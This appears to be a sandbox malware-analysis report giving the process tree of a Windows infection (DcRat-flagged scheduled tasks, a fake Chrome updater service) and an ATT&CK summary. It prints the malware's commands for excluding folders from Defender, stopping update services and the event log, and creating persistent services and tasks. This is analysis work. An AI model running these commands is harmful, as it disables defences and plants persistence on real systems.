C:\Users\Admin\Pictures\PHZUeKsym6c4ao1N4lAzfMjT.exe"C:\Users\Admin\Pictures\PHZUeKsym6c4ao1N4lAzfMjT.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
PID:2236 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:1636
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:2312
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵
- Drops file in Windows directory
PID:1052
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:1152
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:2400
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:1784
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:2084
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:2208
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:336
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:1716
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:656
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:2408
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"4⤵
- Launches sc.exe
PID:2044
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"4⤵
- Launches sc.exe
PID:2636
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:2032
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"4⤵
- Launches sc.exe
PID:2900
-
-
-
C:\Users\Admin\Pictures\GHuvLZsqsmCMoGgf6n6VLvxo.exe"C:\Users\Admin\Pictures\GHuvLZsqsmCMoGgf6n6VLvxo.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1892 -
C:\Users\Admin\AppData\Local\Temp\syncUpd.exeC:\Users\Admin\AppData\Local\Temp\syncUpd.exe4⤵
- Executes dropped EXE
PID:1624
-
-
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exeC:\Users\Admin\AppData\Local\Temp\BroomSetup.exe4⤵PID:2904
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "5⤵PID:2236
-
C:\Windows\SysWOW64\chcp.comchcp 12516⤵PID:3016
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F6⤵
- DcRat
- Creates scheduled task(s)
PID:2216
-
-
-
-
-
C:\Users\Admin\Pictures\RuIUvkS8wVfymaAK7lF9BY8u.exe"C:\Users\Admin\Pictures\RuIUvkS8wVfymaAK7lF9BY8u.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:336
-
-
C:\Users\Admin\Pictures\wz8VvURJ6HobiJci3zt7FzSf.exe"C:\Users\Admin\Pictures\wz8VvURJ6HobiJci3zt7FzSf.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2224 -
C:\Users\Admin\AppData\Local\Temp\is-5PL38.tmp\wz8VvURJ6HobiJci3zt7FzSf.tmp"C:\Users\Admin\AppData\Local\Temp\is-5PL38.tmp\wz8VvURJ6HobiJci3zt7FzSf.tmp" /SL5="$60178,1697450,56832,C:\Users\Admin\Pictures\wz8VvURJ6HobiJci3zt7FzSf.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:1644 -
C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe"C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe" -i5⤵PID:3064
-
-
C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe"C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe" -s5⤵PID:412
-
-
-
-
C:\Users\Admin\Pictures\FusMm6h3ZIYvS3H6ML4oKi29.exe"C:\Users\Admin\Pictures\FusMm6h3ZIYvS3H6ML4oKi29.exe"3⤵
- Executes dropped EXE
PID:1000 -
C:\Users\Admin\Pictures\FusMm6h3ZIYvS3H6ML4oKi29.exe"C:\Users\Admin\Pictures\FusMm6h3ZIYvS3H6ML4oKi29.exe"4⤵PID:2032
-
-
-
C:\Users\Admin\Pictures\ZKgWpaIq4ixsfKfSjBJZNp2s.exe"C:\Users\Admin\Pictures\ZKgWpaIq4ixsfKfSjBJZNp2s.exe"3⤵PID:2192
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵PID:2340
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:2488
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:2996
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:1200
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:2532
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:1872
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:2144
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:3012
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵PID:1252
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵PID:1416
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵PID:1568
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵PID:1668
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:1928
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"4⤵
- Launches sc.exe
PID:1864
-
-
-
C:\Users\Admin\Pictures\MWZ0UpCReh4UDpqFe8lrwVHo.exe"C:\Users\Admin\Pictures\MWZ0UpCReh4UDpqFe8lrwVHo.exe"3⤵PID:2348
-
C:\Users\Admin\AppData\Local\Temp\is-6RKA3.tmp\MWZ0UpCReh4UDpqFe8lrwVHo.tmp"C:\Users\Admin\AppData\Local\Temp\is-6RKA3.tmp\MWZ0UpCReh4UDpqFe8lrwVHo.tmp" /SL5="$60210,1697450,56832,C:\Users\Admin\Pictures\MWZ0UpCReh4UDpqFe8lrwVHo.exe"4⤵PID:2720
-
-
-
C:\Users\Admin\Pictures\Jp275Dhuhpnf32gtIbZFsj8s.exe"C:\Users\Admin\Pictures\Jp275Dhuhpnf32gtIbZFsj8s.exe"3⤵PID:1064
-
-
C:\Users\Admin\Pictures\fO1T1qPAwM5rbuoMSDKChoT7.exe"C:\Users\Admin\Pictures\fO1T1qPAwM5rbuoMSDKChoT7.exe"3⤵PID:2108
-
-
C:\Users\Admin\Pictures\UKHOJolg3CXlziMu5ibYYblw.exe"C:\Users\Admin\Pictures\UKHOJolg3CXlziMu5ibYYblw.exe"3⤵PID:1988
-
C:\Users\Admin\AppData\Local\Temp\syncUpd.exeC:\Users\Admin\AppData\Local\Temp\syncUpd.exe4⤵PID:2340
-
-
-
C:\Users\Admin\Pictures\1LGsDPA6KSDaGGlfV7vAGcyw.exe"C:\Users\Admin\Pictures\1LGsDPA6KSDaGGlfV7vAGcyw.exe"3⤵PID:2860
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵PID:2500
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:3056
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:1064
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:2448
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:2936
-
-
Process tree (continued). Each line gives the tree depth in brackets, the PID, the command line, and any behaviour signatures in square brackets; where the command line does not repeat the image path, the image path follows in parentheses.

      [4] PID 1860  C:\Windows\system32\sc.exe stop wuauserv  [Launches sc.exe]
      [4] PID 1760  C:\Windows\system32\sc.exe stop bits  [Launches sc.exe]
      [4] PID 1864  C:\Windows\system32\sc.exe stop dosvc  [Launches sc.exe]
      [4] PID 2040  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      [4] PID 2340  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      [4] PID 1816  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      [4] PID 1604  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      [4] PID 1984  C:\Windows\system32\sc.exe stop eventlog  [Launches sc.exe]
      [4] PID 2980  C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"  [Launches sc.exe]
  [2] PID 1748  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
[1] PID 1036  "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240310162609.log C:\Windows\Logs\CBS\CbsPersist_20240310162609.cab  [Drops file in Windows directory]
[1] PID 1952  cmd /c ""C:\Users\Admin\AppData\Local\Temp\D5A7.bat" "  (image: C:\Windows\system32\cmd.exe)
  [2] PID 2108  reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1  (image: C:\Windows\system32\reg.exe)
[1] PID 2112  C:\Users\Admin\AppData\Local\Temp\FE0F.exe  [Executes dropped EXE; Loads dropped DLL; Suspicious use of SetThreadContext]
  [2] PID 2416  C:\Users\Admin\AppData\Local\Temp\FE0F.exe  [Executes dropped EXE; Loads dropped DLL; Adds Run key to start application]
    [3] PID 1224  icacls "C:\Users\Admin\AppData\Local\f55404de-f96d-40e3-8f6a-c259dbe6d608" /deny *S-1-1-0:(OI)(CI)(DE,DC)  (image: C:\Windows\SysWOW64\icacls.exe)  [Modifies file permissions]
    [3] PID 604  "C:\Users\Admin\AppData\Local\Temp\FE0F.exe" --Admin IsNotAutoStart IsNotTask  [Executes dropped EXE; Loads dropped DLL; Suspicious use of SetThreadContext]
      [4] PID 1952  "C:\Users\Admin\AppData\Local\Temp\FE0F.exe" --Admin IsNotAutoStart IsNotTask  [Executes dropped EXE; Loads dropped DLL]
        [5] PID 1880  "C:\Users\Admin\AppData\Local\3b3cc6b9-35e4-49ed-98f9-9617d74d1e31\build2.exe"  [Executes dropped EXE; Suspicious use of SetThreadContext]
          [6] PID 1032  "C:\Users\Admin\AppData\Local\3b3cc6b9-35e4-49ed-98f9-9617d74d1e31\build2.exe"  [Executes dropped EXE; Modifies system certificate store]
            [7] PID 1896  C:\Windows\SysWOW64\WerFault.exe -u -p 1032 -s 1420  [Loads dropped DLL; Program crash]
        [5] PID 2640  "C:\Users\Admin\AppData\Local\3b3cc6b9-35e4-49ed-98f9-9617d74d1e31\build3.exe"  [Executes dropped EXE; Suspicious use of SetThreadContext]
          [6] PID 304  "C:\Users\Admin\AppData\Local\3b3cc6b9-35e4-49ed-98f9-9617d74d1e31\build3.exe"  [Executes dropped EXE]
            [7] PID 624  /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"  (image: C:\Windows\SysWOW64\schtasks.exe)  [DcRat; Creates scheduled task(s)]
[1] PID 2704  C:\Windows\windefender.exe  [Executes dropped EXE; Modifies data under HKEY_USERS]
[1] PID 1592  taskeng.exe {029FDEDE-A8B2-4C27-9383-0DACEBD61D66} S-1-5-21-1298544033-3225604241-2703760938-1000:IZKCKOTP\Admin:Interactive:[1]  (image: C:\Windows\system32\taskeng.exe)
  [2] PID 2640  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe  [Executes dropped EXE; Suspicious use of SetThreadContext]
    [3] PID 2328  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe  [Executes dropped EXE]
      [4] PID 1264  /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"  (image: C:\Windows\SysWOW64\schtasks.exe)  [DcRat; Creates scheduled task(s)]
  [2] PID 884  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe  [Executes dropped EXE; Suspicious use of SetThreadContext]
    [3] PID 3060  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe  [Executes dropped EXE]
  [2] PID 1600  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe  [Executes dropped EXE; Suspicious use of SetThreadContext]
    [3] PID 2752  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe  [Executes dropped EXE]
  [2] PID 2480  C:\Users\Admin\AppData\Roaming\vgtejgi  [Executes dropped EXE; Checks SCSI registry key(s); Suspicious behavior: MapViewOfSection]
  [2] PID 2276  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe  [Executes dropped EXE]
    [3] PID 1328  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  [2] PID 1624  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    [3] PID 1840  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  [2] PID 1204  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    [3] PID 2652  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
[1] PID 3064  C:\ProgramData\Google\Chrome\updater.exe  [Drops file in Drivers directory; Executes dropped EXE; Drops file in System32 directory; Suspicious use of SetThreadContext]
  [2] PID 684  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force  [Drops file in System32 directory; Suspicious use of AdjustPrivilegeToken]
  [2] PID 816  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    [3] PID 2736  wusa /uninstall /kb:890830 /quiet /norestart  (image: C:\Windows\system32\wusa.exe)  [Drops file in Windows directory]
  [2] PID 1968  C:\Windows\system32\sc.exe stop UsoSvc  [Launches sc.exe]
  [2] PID 472  C:\Windows\system32\sc.exe stop WaaSMedicSvc  [Launches sc.exe]
  [2] PID 2528  C:\Windows\system32\sc.exe stop wuauserv  [Launches sc.exe]
  [2] PID 560  C:\Windows\system32\sc.exe stop bits  [Launches sc.exe]
  [2] PID 904  C:\Windows\system32\sc.exe stop dosvc  [Launches sc.exe]
  [2] PID 1828  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0  [Suspicious use of AdjustPrivilegeToken]
  [2] PID 928  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0  [Suspicious use of AdjustPrivilegeToken]
  [2] PID 876  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0  [Suspicious use of AdjustPrivilegeToken]
  [2] PID 1816  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0  [Suspicious use of AdjustPrivilegeToken]
  [2] PID 920  C:\Windows\system32\conhost.exe
  [2] PID 2460  explorer.exe  (image: C:\Windows\explorer.exe)  [Suspicious use of AdjustPrivilegeToken]
[1] PID 2252  C:\Users\Admin\AppData\Local\Temp\8D34.exe  [Executes dropped EXE]
  [2] PID 2408  C:\Windows\SysWOW64\WerFault.exe -u -p 2252 -s 124  [Loads dropped DLL; Program crash]
[1] PID 1992  cmd /c ""C:\Users\Admin\AppData\Local\Temp\EBF7.bat" "  (image: C:\Windows\system32\cmd.exe)
  [2] PID 2748  reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1  (image: C:\Windows\system32\reg.exe)
[1] PID 472  C:\Users\Admin\AppData\Local\Temp\2437.exe  [Executes dropped EXE]
[1] PID 2692  C:\Users\Admin\AppData\Local\Temp\43BA.exe
[1] PID 2296  explorer.exe  (image: C:\Windows\explorer.exe)
[1] PID 1892  C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}
[1] PID 1492  C:\Windows\system32\AUDIODG.EXE 0x548
[1] PID 1524  C:\ProgramData\Google\Chrome\updater.exe
  [2] PID 1868  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  [2] PID 1048  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    [3] PID 2108  wusa /uninstall /kb:890830 /quiet /norestart  (image: C:\Windows\system32\wusa.exe)
  [2] PID 1804  C:\Windows\system32\sc.exe stop UsoSvc  [Launches sc.exe]
  [2] PID 1208  C:\Windows\system32\sc.exe stop WaaSMedicSvc  [Launches sc.exe]
  [2] PID 1132  C:\Windows\system32\sc.exe stop wuauserv  [Launches sc.exe]
  [2] PID 2720  C:\Windows\system32\sc.exe stop bits  [Launches sc.exe]
  [2] PID 2276  C:\Windows\system32\sc.exe stop dosvc  [Launches sc.exe]
  [2] PID 3068  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  [2] PID 2228  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  [2] PID 2188  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  [2] PID 1732  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
[1] PID 2788  C:\ProgramData\Google\Chrome\updater.exe
  [2] PID 1672  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Network
MITRE ATT&CK Enterprise v15 (technique counts in parentheses)
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (3)
  - Windows Service (3)
- Scheduled Task/Job (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (3)
  - Windows Service (3)
- Scheduled Task/Job (1)
Defense Evasion
- File and Directory Permissions Modification (1)
- Impair Defenses (5)
  - Disable or Modify System Firewall (1)
  - Disable or Modify Tools (2)
- Modify Registry (4)
- Subvert Trust Controls (1)
  - Install Root Certificate (1)
Downloads